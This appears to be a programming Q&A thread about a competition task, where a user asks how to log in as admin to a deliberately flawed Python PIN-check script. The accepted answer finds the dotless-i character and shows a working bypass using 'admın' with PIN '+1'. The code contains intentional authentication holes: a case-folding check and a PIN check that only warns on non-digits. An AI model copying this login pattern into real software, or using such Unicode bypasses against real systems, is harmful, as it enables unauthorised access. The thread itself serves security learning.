# How do I get admin access by exploiting this code?

Tags: python, python-3.x, exploit

I am taking part in a competition and i can't solve this task.
The objective is to login with the different accounts listed in the secrets dictionary, without knowing the pin codes.
Changing the code is not allowed.
For example you can login with guest by using the input:

```
anything
0
```

and with user by:

```
user
-1
```

I can't figure out how to login with admin.

```
#!/usr/bin/python3
# Change the pin codes here before using this software:
secrets = {
    "guest": 123456,
    "user": 123456,
    "admin": 123456
    }

def authenticate():
  selected_user = input("Enter your username: ")

  if selected_user.lower() == "admin":
    print("Administrator access is disabled on this interface!")
    return None

  real_user = "guest"
  real_pin = 0

  for (user, pin) in secrets.items():
    if user.upper() == selected_user.upper():
      real_user = user
      real_pin = pin

  try:
    pin_as_string = input("Enter your PIN code: ")
    selected_pin = int(pin_as_string)
  except:
    print("Some error occured while reading PIN code, please try again!")
    return None

  if not pin_as_string.isdigit():
    print("Warning: the PIN contains a non-digit character!")

  elif selected_pin != real_pin:
    print("Incorrect PIN code!")
    return None

  return real_user

user = authenticate()
if user is not None:
  print("Successful login as", user)
```

Comment: I imagine there's probably a unicode character that turns into a regular ascii character when uppercased, letting you pass the `if user.upper() == selected_user.upper():` check.

Comment: Thats what i was thinking, but i can't find one.

Comment: `if selected_user.lower() == "admin":
    print("Administrator access is disabled on this interface!")
    return None`

I think you cant loging to admin aslong as this line is present

Comment: I think that there is a way around it, like what Aran-Frey mentioned. The task says that there is a solution to all 3 accounts.

Comment: @TheDancs you need to provide full description what task say , for better understanding

Comment: @TheDancs also the code part after try should be inside the for loop

Comment: I didn't write the code, my goal is to find a mistake in it to login with admin, whitout changing the code.

Answer (score 2, accepted):

You want a character that maps to a letter of `"ADMIN"` when upper cased. It is easy to ask Python for it:

```
lst = []
for i in range(0xffff):
    try:
        c = chr(i)
        if c.upper() in "ADMIN": print(hex(i), c, c.lower())
    except Exception as e:       # don't break if any exception
        print(i, "->", e)
```

You get

```
0x41 A a
0x44 D d
0x49 I i
0x4d M m
0x4e N n
0x61 a a
0x64 d d
0x69 i i
0x6d m m
0x6e n n
0x131 ı ı
```

This interesting value is the last one: U+0131 which is *LATIN SMALL LETTER DOTLESS I* according to the `unicodedata` module.

In Microsoft Windows, this character exists in code page 850: `print(chr(0x131).encode('cp850'))` gives `b'\xd5'`. So the sequence <kbd>Alt</kbd> <kbd>Num 2</kbd> <kbd>Num 1</kbd> <kbd>Num 3</kbd> will allow to enter it in the console (`hex(213)` is `'0xd5'`). And +1 or -1 as password will do the trick! From my own console:

```
Enter your username: admın
Enter your PIN code: +1
Warning: the PIN contains a non-digit character!
Successful login as admin
```

Unsure for other systems, but [Unicode input](https://en.wikipedia.org/wiki/Unicode_input) on Wikipedia could help.

Comment: How about `if c.upper() in "ADMIN" and c.lower() not in "admin"`?

Comment: @tobias_k: It would just be better... But I hoped to get few enough matches to be able to find the relevant one by hand (or by *eye* here).

Comment: Thank you very much for your help!